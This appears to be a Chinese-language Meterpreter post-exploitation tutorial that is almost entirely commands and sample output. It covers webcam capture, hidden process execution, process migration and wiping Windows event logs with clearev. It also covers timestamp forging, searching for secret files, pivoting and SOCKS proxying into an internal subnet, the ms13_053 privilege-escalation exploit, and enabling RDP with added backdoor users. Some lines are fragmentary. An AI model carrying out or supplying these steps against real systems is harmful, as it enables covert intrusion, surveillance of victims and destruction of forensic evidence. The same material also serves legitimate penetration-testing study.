meterpreter > webcam_list [-] webcam_list: Operation failed: A device attached to the system is not functioning. meterpreter > webcam_snap [-] webcam_list: Operation failed: A device attached to the system is not functioning. meterpreter >
而如果你存在摄像头的话是这样的
meterpreter > webcam_list 1: FaceTime HD Camera (Built-in)
拍摄照片
执行文件
参数列表如下
meterpreter > execute Usage: execute -f file [options] Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view. -a <opt> The arguments to pass to the command. -c Channelized I/O (required for interaction). -d <opt> The 'dummy' executable to launch when using -m. -f <opt> The executable command to run. -h Help menu. -i Interact with the process after creating it. -k Execute process on the meterpreters current desktop -m Execute from memory. -s <opt> Execute process in a given session as the session user -t Execute process with currently impersonated thread token
meterpreter > migrate 2192 [*] Migrating from 12116 to 2192... [-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges) meter
如果权限相同的启动进程是可以注入的
meterpreter > migrate 12032 [*] Migrating from 180 to 12032... [*] Migration completed successfully. meterpreter > getpid Current pid: 12032
清除日志
clearev #清除windows中的应用程序日志、系统日志、安全日志,需要管理员权限
执行前
执行后
meterpreter > clearev [*] Wiping 4993 records from Application... [*] Wiping 2239 records from System... [*] Wiping 11222 records from Security...
-a <opt> Set the "last accessed" time of the file -b Set the MACE timestamps so that EnCase shows blanks -c <opt> Set the "creation" time of the file -e <opt> Set the "mft entry modified" time of the file -f <opt> Set the MACE of attributes equal to the supplied file -h Help banner -m <opt> Set the "last written" time of the file -r Set the MACE timestamps recursively on a directory -v Display the UTC MACE values of the file -z <opt> Set all four attributes (MACE) of the file
-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: ) -f <opt> A file pattern glob to search for. (e.g. *secret*.doc?) -h Help Banner -r <opt> Recursivly search sub directories. (Default: true)
-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to. -R Indicates a reverse port forward. -h Help banner. -i <opt> Index of the port forward entry to interact with (see the "list"command). -l <opt> Forward: local port to listen on. Reverse: local port to connect to. -p <opt> Forward: remote port to connect to. Reverse: remote port to listen on. -r <opt> Forward: remote host to connect to.
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] [*] Usage: run autoroute [-r] -s subnet -n netmask [*] Examples: [*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0 [*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0 [*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay [*] run autoroute -p # Print active routing table [*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route [*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
示例
run autoroute -s 192.168.159.0/24 #添加到目标环境网络 run autoroute –p #查看添加的路由
然后可以利用arp_scanner、portscan等进行扫描
run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24 run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389
Socks4a代理
autoroute添加完路由后,还可以利用msf自带的sock4a模块进行Socks4a代理
msf> use auxiliary/server/socks4a msf > set srvhost 127.0.0.1 msf > set srvport 1080 msf > run
然后
vi /etc/proxychains.conf #添加 socks4 127.0.0.1 1080
run post/windows/gather/checkvm #是否虚拟机 run post/linux/gather/checkvm #是否虚拟机 run post/windows/gather/forensics/enum_drives #查看分区 run post/windows/gather/enum_applications #获取安装软件信息 run post/windows/gather/dumplinks #获取最近的文件操作 run post/windows/gather/enum_ie #获取IE缓存 run post/windows/gather/enum_chrome #获取Chrome缓存 run post/windows/gather/enum_patches #补丁信息 run post/windows/gather/enum_domain #查找域控
meterpreter > run post/windows/gather/enum_patches #查看补丁信息 msf > use exploit/windows/local/ms13_053_schlamperei msf > set SESSION 2 msf > exploit
远程桌面&截屏
enumdesktops #查看可用的桌面 getdesktop #获取当前meterpreter 关联的桌面 set_desktop #设置meterpreter关联的桌面 -h查看帮助 screenshot #截屏 use espia #或者使用espia模块截屏 然后输入screengrab run vnc #使用vnc远程桌面连接,这方法有点问题,上传了exe但是启动不了
enumdesktops
meterpreter > enumdesktops Enumerating all accessible desktops
Desktops ========
Session Station Name ------- ------- ---- 1 WinSta0 Default
screenshot
espia模块
开启rdp&添加用户
getgui
参数列表如下
meterpreter > run getgui –h
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp. [!] Example: run post/windows/manage/enable_rdp OPTION=value [...] Windows Remote Desktop Enabler Meterpreter Script Usage: getgui -u <username> -p <password> Or: getgui -e
OPTIONS:
-e Enable RDP only. -f <opt> Forward RDP Connection. -h Help menu. -p <opt> The Password of the user to add. -u <opt> The Username of the user to add.
示例
run getgui -e #开启远程桌面 run getgui -u lltest2 -p 123456 #添加用户 run getgui -f 6661 –e #3389端口转发到6661
这种方法不推荐是用,容易创建失败
enable_rdp
run post/windows/manage/enable_rdp #开启远程桌面 run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户 run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662
meterpreter reg –h Usage: reg [command] [options] Interact with the target machine's registry. OPTIONS: -d <opt> The data to store in the registry value.#注册表中值的数据 -h Help menu. -k <opt> The registry key path (E.g. HKLM\Software\Foo).#注册表键路径 -r <opt> The remote machine name to connect to (with current process credentials#要连接的远程计算机名称(使用当前进程凭据) -t <opt> The registry value type (E.g. REG_SZ).#注册表值类型 -v <opt> The registry value name (E.g. Stuff).#注册表键名称 -w Set KEY_WOW64 flag, valid values [32|64].#设置32位注册列表还是64位 COMMANDS: enumkey Enumerate the supplied registry key [-k <key>]#枚举可获得的键 createkey Create the supplied registry key [-k <key>]#创建提供的注册表项 deletekey Delete the supplied registry key [-k <key>]#删除提供的注册表项 queryclass Queries the class of the supplied key [-k <key>]#查询键值数据 setval Set a registry value [-k <key> -v <val> -d <data>]#设置键值 deleteval Delete the supplied registry value [-k <key> -v <val>]#删除提供的注册表值 queryval Queries the data contents of a value [-k <key> -v <val>]#查询值的数据内容